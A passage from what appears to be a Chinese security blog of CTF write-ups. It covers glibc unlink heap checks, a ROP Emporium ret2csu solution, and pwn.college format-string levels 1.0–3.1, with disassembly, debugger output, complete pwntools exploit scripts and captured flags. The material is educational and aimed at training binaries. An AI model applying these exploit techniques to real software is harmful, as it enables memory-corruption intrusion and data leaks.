    /*
      If the chunk borders the current high end of memory,
      consolidate into top
    */

    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }

unlink 代码如下：

/* Take a chunk off a bin list.  */
static void
unlink_chunk (mstate av, mchunkptr p)
{
  if (chunksize (p) != prev_size (next_chunk (p)))
    malloc_printerr ("corrupted size vs. prev_size");

  mchunkptr fd = p->fd;
  mchunkptr bk = p->bk;

  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
    malloc_printerr ("corrupted double-linked list");

  fd->bk = bk;
  bk->fd = fd;
  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
    {
      if (p->fd_nextsize->bk_nextsize != p
   || p->bk_nextsize->fd_nextsize != p)
 malloc_printerr ("corrupted double-linked list (not small)");

      if (fd->fd_nextsize == NULL)
 {
   if (p->fd_nextsize == p)
     fd->fd_nextsize = fd->bk_nextsize = fd;
   else
     {
       fd->fd_nextsize = p->fd_nextsize;
       fd->bk_nextsize = p->bk_nextsize;
       p->fd_nextsize->bk_nextsize = fd;
       p->bk_nextsize->fd_nextsize = fd;
     }
 }
      else
 {
   p->fd_nextsize->bk_nextsize = p->bk_nextsize;
   p->bk_nextsize->fd_nextsize = p->fd_nextsize;
 }
    }
}

对于 unlink 的保护，首先得绕过这个 size 检测，即，下一个 chunk 的 prev_size 和当前 chunk 的 chunk_size 得是相等的：

  if (chunksize (p) != prev_size (next_chunk (p)))
    malloc_printerr ("corrupted size vs. prev_size");

然后还有两个要注意的地方，即 P->fd->bk == P && P->bk->fd == P：

  mchunkptr fd = p->fd;
  mchunkptr bk = p->bk;

  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
    malloc_printerr ("corrupted double-linked list");

实际的 unlinking 代码为：

mchunkptr fd = p->fd;
mchunkptr bk = p->bk;

fd->bk = bk;
bk->fd = fd;

经调试发现，它们改的都是同一个值，所以最后生效的其实只有 bk->fd = fd，即把 chunk 0 的地址改为了 fake chunk 的 fd 值。现在，我们向 chunk 0 写入数据就是写入到 fake chunk 的 fd 指向的值中去了。

Write-ups: ROP Emporium series

Sat, 01 Feb 2025 00:00:00 GMT

前言

两月一号了，眼看九号就要打比赛我却还没学过 ret2csu 和 SROP，所以特此提前开一章 ROP Emporium 的题解，问就是里面有一道 ret2csu，而且早晚会得这份题库的 LMAO

可惜没有 SROP，那这个我只能去 Nightmare 找题做了，要不就自己出一题也行。

啊，突然想起来还有 ret2dlresolve 和 ret2vDSO……一会儿再开一章 tricks 专题好了，就从 ROP 的 tricks 开始写。

Challenge 8

Information

Category: Pwn

Description

We're back in ret2win territory, but this time with no useful gadgets.<br/> How will we populate critical registers without them?

Write-up

~好啊，ROP Emporium 一共就八道题，而 ret2csu 就是这最后一题，有种上来就 bypass 小怪直奔去 attack BOSS's ass 的感觉，帅不帅？(bushi)~

嗯……有关 ret2csu 这个 trick 的详细信息，可以去读这篇发在 Black Hat Asia 的论文[^1].

简单来说就是当你找不到可以控制函数参数的 gadgets 时，就可以考虑一下这个 trick.

当一个程序使用某些库（如 libc）时，它有一些内置函数来管理程序不同部分之间的通信。在这些函数中，有一些隐藏的宝石可以作为我们缺失的 gadgets，特别是一个叫 __libc_csu_init 的函数。——Hack Tricks

就以本题的 __libc_csu_init 为例（不同版本的 libc 的这个函数可能略有区别，不过影响不大），看一下里面有什么好东东：

__libc_csu_init
__libc_csu_init          ; =============== S U B R O U T I N E =======================================
__libc_csu_init
__libc_csu_init
__libc_csu_init          ; void __fastcall _libc_csu_init(unsigned int, __int64, __int64)
__libc_csu_init                          public __libc_csu_init
__libc_csu_init          __libc_csu_init proc near               ; DATA XREF: _start+16↑o
__libc_csu_init          ; __unwind {
__libc_csu_init      000                 push    r15
__libc_csu_init+2    008                 push    r14
__libc_csu_init+4    010                 mov     r15, rdx
__libc_csu_init+7    010                 push    r13
__libc_csu_init+9    018                 push    r12
__libc_csu_init+B    020                 lea     r12, __frame_dummy_init_array_entry ; Load Effective Address
__libc_csu_init+12   020                 push    rbp
__libc_csu_init+13   028                 lea     rbp, __do_global_dtors_aux_fini_array_entry ; Load Effective Address
__libc_csu_init+1A   028                 push    rbx
__libc_csu_init+1B   030                 mov     r13d, edi
__libc_csu_init+1E   030                 mov     r14, rsi
__libc_csu_init+21   030                 sub     rbp, r12        ; Integer Subtraction
__libc_csu_init+24   030                 sub     rsp, 8          ; Integer Subtraction
__libc_csu_init+28   038                 sar     rbp, 3          ; Shift Arithmetic Right
__libc_csu_init+2C   038                 call    _init_proc      ; Call Procedure
__libc_csu_init+31   038                 test    rbp, rbp        ; Logical Compare
__libc_csu_init+34   038                 jz      short loc_400696 ; Jump if Zero (ZF=1)
__libc_csu_init+36   038                 xor     ebx, ebx        ; Logical Exclusive OR
__libc_csu_init+38   038                 nop     dword ptr [rax+rax+00000000h] ; No Operation
__libc_csu_init+40
__libc_csu_init+40       loc_400680:                             ; CODE XREF: __libc_csu_init+54↓j
__libc_csu_init+40   038                 mov     rdx, r15
__libc_csu_init+43   038                 mov     rsi, r14
__libc_csu_init+46   038                 mov     edi, r13d
__libc_csu_init+49   038                 call    ds:(__frame_dummy_init_array_entry - 600DF0h)[r12+rbx*8] ; Indirect Call Near Procedure
__libc_csu_init+4D   038                 add     rbx, 1          ; Add
__libc_csu_init+51   038                 cmp     rbp, rbx        ; Compare Two Operands
__libc_csu_init+54   038                 jnz     short loc_400680 ; Jump if Not Zero (ZF=0)
__libc_csu_init+56
__libc_csu_init+56       loc_400696:                             ; CODE XREF: __libc_csu_init+34↑j
__libc_csu_init+56   038                 add     rsp, 8          ; Add
__libc_csu_init+5A   030                 pop     rbx
__libc_csu_init+5B   028                 pop     rbp
__libc_csu_init+5C   020                 pop     r12
__libc_csu_init+5E   018                 pop     r13
__libc_csu_init+60   010                 pop     r14
__libc_csu_init+62   008                 pop     r15
__libc_csu_init+64   000                 retn                    ; Return Near from Procedure
__libc_csu_init+64       ; } // starts at 400640
__libc_csu_init+64       __libc_csu_init endp
__libc_csu_init+64
__libc_csu_init+64       ; ---------------------------------------------------------------------------

我们发现有两个实用的 gadgets，分别是：

pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret

mov rdx, r15
mov rsi, r14
mov edi, r13d
call QWORD PTR [r12 + rbx * 8]

这不就直接控制了函数的前三个参数了？多好。

注意第二个 gadget 也可以是以 ret 结束的，但是需要抵消一些 side effects：

mov rdx, r15
mov rsi, r14
mov edi, r13d
call QWORD PTR [r12 + rbx * 8]
add rbx, 0x1
cmp rbp, rbx
jnz <func>
  <snap>
ret

[r12 + rbx * 8] 必须指向一个存储可调用函数的地址（如果没有想法且没有 PIE，可以直接使用 _init 函数）。
rbp 和 rbx 必须具有相同的值以避免跳转。
有一些被省略的 pops 需要考虑。

另外，从 ret2csu gadget 控制 rdi 和 rsi 的另一种方法是通过访问特定的偏移量，可以参考这篇讲 BROP 的论文[^2].

唯一一个问题可能就是怎么让 call QWORD PTR [r12 + rbx * 8] 调用 _init 了，不解释，直接看操作：

pwndbg> x/a _init
0x4004d0 <_init>: 0x1d058b4808ec8348
pwndbg> search -t dword 0x4004d0
Searching for a 4-byte integer: b'\xd0\x04@\x00'
ret2csu         0x400398 rol byte ptr [rax + rax*2], 1
ret2csu         0x400e38 rol byte ptr [rax + rax*2], 1
ret2csu         0x600398 0x4004d0 (_init)
ret2csu         0x600e38 0x4004d0 (_init)

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./ret2csu"
HOST, PORT = "localhost", 1337

gdbscript = """
b *pwnme+133
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload():
    padding_to_ret = b"".ljust(0x28, b"A")

    _init = 0x600398
    __libc_csu_init = elf.symbols["__libc_csu_init"]

    generic_gadget_1 = __libc_csu_init + 90
    generic_gadget_2 = __libc_csu_init + 64
    pop_rdi_ret = __libc_csu_init + 99

    cleanup_regs = [b"".ljust(0x8, b"A") * 6]

    return flat(
        padding_to_ret,
        generic_gadget_1,
        0x0,  # rbx
        0x1,  # rbp
        _init,  # r12 —▸ _init
        b"".ljust(0x8, b"A"),  # r13
        0xCAFEBABECAFEBABE,  # r14 —▸ rsi
        0xD00DF00DD00DF00D,  # r15 —▸ rdx
        generic_gadget_2,
        b"".ljust(0x8, b"A"),  # add rsp, 0x8
        *cleanup_regs,  # for generic_gadget_1
        pop_rdi_ret,
        0xDEADBEEFDEADBEEF,
        elf.symbols["ret2win"],
    )


def attack(target):
    try:
        payload = construct_payload()

        target.sendafter(b"> ", payload)

        response = target.recvall(timeout=3)

        if b"ROPE{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: ROPE{a_placeholder_32byte_flag!}

后记

没有后记，这系列还有七题没打呢写个毛的后记……

[^1]: Marco-gisbert, Hector and Ismael Ripoll. "return-to-csu: a new method to bypass 64-bit Linux ASLR." (2018). [^2]: A. Bittau, A. Belay, A. Mashtizadeh, D. Mazières and D. Boneh, "Hacking Blind," 2014 IEEE Symposium on Security and Privacy, Berkeley, CA, USA, 2014, pp. 227-242, doi: 10.1109/SP.2014.22.

Write-ups: Software Exploitation (Format String Exploits) series

Wed, 29 Jan 2025 00:00:00 GMT

前言

It's a thrilling intellectual puzzle, unlocking the secrets of a program from the inside out.

~Description 你别吓我，万一我 IQ 没及格怎么办？那不是炸了？？~

玩点简单的 (probably)？智力游戏吧～泄漏/篡改数据神技，小子，是不是应该学透彻？

Level 1.0

Information

Category: Pwn

Description

Use a format string exploit to reveal a string stored on the stack.

Write-up

unsigned __int64 func()
{
  unsigned int v0; // eax
  int v1; // eax
  _BYTE v3[456]; // [rsp+0h] [rbp-1E0h] BYREF
  unsigned __int64 v4; // [rsp+1C8h] [rbp-18h]
  __int64 savedregs; // [rsp+1E0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+1E8h] [rbp+8h] BYREF

  v4 = __readfsqword(0x28u);
  sp_ = (__int64)v3;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - v3) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  memset(&v3[16], 0, 0x1B0uLL);
  v0 = time(0LL);
  srand(v0);
  *(_DWORD *)&v3[112] = 0;
  while ( *(int *)&v3[112] <= 14 )
  {
    v3[*(int *)&v3[112]] = rand() % 26 + 65;
    ++*(_DWORD *)&v3[112];
  }
  v3[15] = 0;
  *(_QWORD *)&v3[80] = v3;
  puts("There is a 15-character uppercase secret password hidden on the stack!");
  puts("If you find it, you will be given the flag!");
  putchar(10);
  printf("The secret password is located at %p and the stack pointer is located at %p.\n", &v3[80], (const void *)sp_);
  printf(
    "The difference between these addresses is: %d (%d / 8).\n",
    (unsigned __int64)&v3[-sp_ + 80] >> 3,
    (unsigned int)&v3[-sp_ + 80]);
  printf("This means, before the printf, the arguments to the format string will look something like:\n");
  printf("%p:\t[SECRET_PASSWORD]\n", &v3[80]);
  *(_DWORD *)&v3[112] = 0;
  while ( *(int *)&v3[112] < (unsigned __int64)&v3[-sp_ + 80] >> 3 )
  {
    printf("%p:\t[?]\n", &v3[-8 - 8LL * *(int *)&v3[112] + 80]);
    ++*(_DWORD *)&v3[112];
  }
  puts("R9:\t\t[?]");
  puts("R8:\t\t[?]");
  puts("RCX:\t\t[?]");
  puts("RDX:\t\t[?]");
  puts("RSI:\t\t[?]");
  puts("RDI:\t\t[FORMAT_STRING]");
  printf("I will now read up to %d bytes. Send your data!\n", 256);
  *(_DWORD *)&v3[116] = read(0, &v3[149], 0x100uLL);
  v3[*(int *)&v3[116] + 149] = 0;
  printf("Received %d bytes!\n", *(_DWORD *)&v3[116]);
  putchar(10);
  printf("I will now call printf on your data!\n");
  putchar(10);
  printf(&v3[149], 256LL);
  putchar(10);
  puts("What is the secret password?");
  *(_DWORD *)&v3[116] = read(0, &v3[96], 0xFuLL);
  v3[*(int *)&v3[116] + 96] = 0;
  if ( !strcmp(*(const char **)&v3[80], &v3[96]) )
  {
    puts("Correct Password!");
    v1 = open("/flag", 0);
    sendfile(1, v1, 0LL, 0x400uLL);
  }
  else
  {
    puts("Wrong Password!");
  }
  return __readfsqword(0x28u) ^ v4;
}

第一题，核心伪代码如上，会随机生成一串字符串到栈上某个位置，绿色部分会判断输入是否和栈上的随机字符串相符，成立则输出 flag。

红色部分直接把输入作为 printf() 的 const char *format 参数，是一个很明显的格式化字符串漏洞。

再简单计算一下随机字符串在栈上第几位，加上 6 (RDI、RSI、RDX、RCX、R8、R9) 就是我们需要泄漏的参数位了。

Breakpoint 1, 0x00005b65398e08db in func ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
 RAX  0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'
 RBX  0x7ffe30164a18 —▸ 0x7ffe3016677b ◂— '/home/cub3y0nd/Projects/pwn.college/babyfmt_level1.0'
 RCX  0x7b2b06f98a21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x7ffe30164740 ◂— 0xa /* '\n' */
 RDI  0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'
 RSI  0x7ffe30164740 ◂— 0xa /* '\n' */
 R8   0x64
 R9   0xffffffff
 R10  0
 R11  0x246
 R12  1
 R13  0
 R14  0x7b2b070e5000 (_rtld_global) —▸ 0x7b2b070e62e0 —▸ 0x5b65398df000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffe301648c0 —▸ 0x7ffe301648f0 —▸ 0x7ffe30164990 —▸ 0x7ffe301649f0 ◂— 0
 RSP  0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'
 RIP  0x5b65398e08db (func+936) ◂— call strcmp@plt
─────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
 ► 0x5b65398e08db <func+936>    call   strcmp@plt                  <strcmp@plt>
        s1: 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'
        s2: 0x7ffe30164740 ◂— 0xa /* '\n' */

   0x5b65398e08e0 <func+941>    test   eax, eax
   0x5b65398e08e2 <func+943>    jne    func+1005                   <func+1005>

   0x5b65398e08e4 <func+945>    lea    rdi, [rip + 0xa60]     RDI => 0x5b65398e134b ◂— 'Correct Password!'
   0x5b65398e08eb <func+952>    call   puts@plt                    <puts@plt>

   0x5b65398e08f0 <func+957>    mov    esi, 0                 ESI => 0
   0x5b65398e08f5 <func+962>    lea    rdi, [rip + 0xa61]     RDI => 0x5b65398e135d ◂— 0x72570067616c662f /* '/flag' */
   0x5b65398e08fc <func+969>    mov    eax, 0                 EAX => 0
   0x5b65398e0901 <func+974>    call   open@plt                    <open@plt>

   0x5b65398e0906 <func+979>    mov    ebx, eax
   0x5b65398e0908 <func+981>    mov    ecx, 0x400             ECX => 0x400
───────────────────────────────────[ STACK ]───────────────────────────────────
00:0000│ rax rdi rsp 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'
01:0008│-1d8         0x7ffe301646e8 ◂— 0x51485748424d52 /* 'RMBHWHQ' */
02:0010│-1d0         0x7ffe301646f0 ◂— 0
... ↓                5 skipped
─────────────────────────────────[ BACKTRACE ]─────────────────────────────────
 ► 0   0x5b65398e08db func+936
   1   0x5b65398e0a53 main+264
   2   0x7b2b06eb2e08 None
   3   0x7b2b06eb2ecc __libc_start_main+140
   4   0x5b65398e022e _start+46
───────────────────────────────────────────────────────────────────────────────
pwndbg> stack 30
00:0000│ rax rdi rsp 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'
01:0008│-1d8         0x7ffe301646e8 ◂— 0x51485748424d52 /* 'RMBHWHQ' */
02:0010│-1d0         0x7ffe301646f0 ◂— 0
... ↓                7 skipped
0a:0050│-190         0x7ffe30164730 —▸ 0x7ffe301646e0 ◂— 'XJHHXBRPRMBHWHQ'
0b:0058│-188         0x7ffe30164738 ◂— 0
0c:0060│ rdx rsi     0x7ffe30164740 ◂— 0xa /* '\n' */
0d:0068│-178         0x7ffe30164748 ◂— 0
0e:0070│-170         0x7ffe30164750 ◂— 0x10000000a /* '\n' */
0f:0078│-168         0x7ffe30164758 ◂— 0
... ↓                2 skipped
12:0090│-150         0x7ffe30164770 ◂— 0xa0000000000
13:0098│-148         0x7ffe30164778 ◂— 0
... ↓                10 skipped
pwndbg> dist 0x7ffe30164730 $rsp
0x7ffe30164730->0x7ffe301646e0 is -0x50 bytes (-0xa words)
pwndbg> p/d 0x50/8+6
$1 = 16

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    log,
    process,
    raw_input,
    remote,
)

FILE = "./babyfmt_level1.0"
HOST, PORT = "94.237.57.115", 42156

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)
    return target


def main():
    target = launch()

    target.sendafter(b"Send your data!", "%16$s")
    target.recvuntil(b"I will now call printf on your data!\n\n")

    secret = target.recvline(False)
    target.sendafter(b"What is the secret password?\n", secret)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{UGd_h1EnEGQDMhB1PSrD81fSSXs.dZTM0MDL5cTNxgzW}

Level 1.1

Information

Category: Pwn

Description

Use a format string exploit to reveal a string stored on the stack.

Write-up

参见 Level 1.0。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level1.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(leak_offset):
    payload = f"%{leak_offset}$s".encode()

    return payload


def attack(target):
    try:
        payload = construct_payload(10)

        target.send(payload)
        target.recvuntil(b"I will now call printf on your data!\n\n")

        password = target.recv(0xF)
        target.sendafter(b"What is the secret password?\n", password)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch() as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{UQu4aFVleX5KV74QVvgMLBddqc-.ddTM0MDL5cTNxgzW}

Level 2.0

Information

Category: Pwn

Description

Use a format string exploit to reveal a string stored on the stack.

Write-up

Breakpoint 1, 0x00005a05148a88fe in func ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────
 RAX  0x7ffe6d89d0a0 ◂— 'VCOMITKAHQHVEVP'
 RBX  0x7ffe6d89d438 —▸ 0x7ffe6d89e77b ◂— '/home/cub3y0nd/Projects/pwn.college/babyfmt_level2.0'
 RCX  0x71da28ecea21 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x7ffe6d89d0b0 ◂— 0xa /* '\n' */
 RDI  0x7ffe6d89d0a0 ◂— 'VCOMITKAHQHVEVP'
 RSI  0x7ffe6d89d0b0 ◂— 0xa /* '\n' */
 R8   0x64
 R9   0xffffffff
 R10  0
 R11  0x246
 R12  1
 R13  0
 R14  0x71da2901b000 (_rtld_global) —▸ 0x71da2901c2e0 —▸ 0x5a05148a7000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffe6d89d2e0 —▸ 0x7ffe6d89d310 —▸ 0x7ffe6d89d3b0 —▸ 0x7ffe6d89d410 ◂— 0
 RSP  0x7ffe6d89d040 ◂— 0x800000
 RIP  0x5a05148a88fe (func+971) ◂— call strcmp@plt
─────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────
 ► 0x5a05148a88fe <func+971>     call   strcmp@plt                  <strcmp@plt>
        s1: 0x7ffe6d89d0a0 ◂— 'VCOMITKAHQHVEVP'
        s2: 0x7ffe6d89d0b0 ◂— 0xa /* '\n' */

   0x5a05148a8903 <func+976>     test   eax, eax
   0x5a05148a8905 <func+978>     jne    func+1040                   <func+1040>

   0x5a05148a8907 <func+980>     lea    rdi, [rip + 0xaad]     RDI => 0x5a05148a93bb ◂— 'Correct Password!'
   0x5a05148a890e <func+987>     call   puts@plt                    <puts@plt>

   0x5a05148a8913 <func+992>     mov    esi, 0                 ESI => 0
   0x5a05148a8918 <func+997>     lea    rdi, [rip + 0xaae]     RDI => 0x5a05148a93cd ◂— 0x72570067616c662f /* '/flag' */
   0x5a05148a891f <func+1004>    mov    eax, 0                 EAX => 0
   0x5a05148a8924 <func+1009>    call   open@plt                    <open@plt>

   0x5a05148a8929 <func+1014>    mov    ebx, eax
   0x5a05148a892b <func+1016>    mov    ecx, 0x400             ECX => 0x400
───────────────────────────────────[ STACK ]───────────────────────────────────
00:0000│ rsp 0x7ffe6d89d040 ◂— 0x800000
01:0008│-298 0x7ffe6d89d048 —▸ 0x7ffe6d89d0a0 ◂— 'VCOMITKAHQHVEVP'
02:0010│-290 0x7ffe6d89d050 ◂— 0
... ↓        5 skipped
─────────────────────────────────[ BACKTRACE ]─────────────────────────────────
 ► 0   0x5a05148a88fe func+971
   1   0x5a05148a8a76 main+264
   2   0x71da28de8e08 None
   3   0x71da28de8ecc __libc_start_main+140
   4   0x5a05148a822e _start+46
───────────────────────────────────────────────────────────────────────────────
pwndbg> x/2gx 0x7ffe6d89d0a0
0x7ffe6d89d0a0: 0x414b54494d4f4356 0x0050564556485148
pwndbg> x/s 0x7ffe6d89d0a0
0x7ffe6d89d0a0: "VCOMITKAHQHVEVP"
pwndbg> dist $rdi $rsp
0x7ffe6d89d0a0->0x7ffe6d89d040 is -0x60 bytes (-0xc words)
pwndbg> p/d 0x60/8+6
$1 = 18

这次我剑走偏锋，不用 %s 了，而是尝试用更麻烦一点的 %llx 输出栈上保存的随机字符串值，转换为 ASCII。因为小端序，所以还需要再反转一下。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote, unhex

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level2.0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload():
    payload = b"%18$llx%19$llx"

    return payload


def attack(target):
    try:
        payload = construct_payload()

        target.send(payload)
        target.recvuntil(b"I will now call printf on your data!\n\n")

        password = flat(
            unhex(target.recv(2 * 8))[::-1],
            unhex(target.recv(2 * 7))[::-1],
        )

        target.sendafter(b"What is the secret password?\n", password)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch() as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{QZG8MJMHwVhFNzjDx4guy6MBfEL.dhTM0MDL5cTNxgzW}

Level 2.1

Information

Category: Pwn

Description

Use a format string exploit to reveal a string stored on the stack.

Write-up

参见 Level 2.0。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote, unhex

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level2.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload():
    payload = b"%18$llx%19$llx"

    return payload


def attack(target):
    try:
        payload = construct_payload()

        target.send(payload)
        target.recvuntil(b"I will now call printf on your data!\n\n")

        password = flat(
            unhex(target.recv(2 * 8))[::-1],
            unhex(target.recv(2 * 7))[::-1],
        )

        target.sendafter(b"What is the secret password?\n", password)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch() as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{MjTMloC44qXLBonimJ5i3Zq3ux-.dlTM0MDL5cTNxgzW}

Level 3.0

Information

Category: Pwn

Description

Use a format string exploit to read the flag directly from the .bss section.

Write-up

这题直接把 flag 读到 .bss 段了，所以思路很简单，就是把 .bss 的地址写到栈上某个位置，然后通过 %s 解引用输出这个地址的值。

注意一定是先输入 fmtstr 再接地址，这个应该不需要解释吧。

遇事别慌多调试，~debugger 是你的 gf，你还不懂吗。~

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level3.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+436
b *func+549
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(position, data_offset):
    return flat(
        f"aaa%{position}$s\x00",
        elf.bss() + data_offset,
    )


def attack(target):
    try:
        payload = construct_payload(16, 0x70)

        target.sendafter(b"Send your data!", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{coYB13XxKYo3asb6os4GxIefmpC.dBjM0MDL5cTNxgzW}

Level 3.1

Information

Category: Pwn

Description

Use a format string exploit to read the flag directly from the .bss section.

Write-up

参见 Level 3.0。

睡了一天为什么还是好困，不写了，睡觉觉，在想明天或者以后要不要写一个技巧向专题？明天得学学 ret2csu 和 SROP。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level3.1"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+310
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(position, data_offset):
    return flat(
        f"%{position}$s\x00",
        elf.bss() + data_offset,
    )


def attack(target):
    try:
        payload = construct_payload(20, 0x90)

        target.sendafter(b"Send your data!", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{UtDc1WIH6qas-RrhigjZpPLWMUP.dFjM0MDL5cTNxgzW}

Level 4.0

Information

Category: Pwn

Description

Use a format string exploit to set a global variable.

Write-up

int check_win()
{
  int v0; // eax

  puts("Checking win value...");
  printf("... desired win value: %#lx\n", 194LL);
  printf("... written win value: %#lx\n", qword_404160);
  if ( qword_404160 != 0xC2 )
    return puts("... INCORRECT!");
  puts("... SUCCESS! Here is your flag:");
  v0 = open("/flag", 0);
  return sendfile(1, v0, 0LL, 0x80uLL);
}

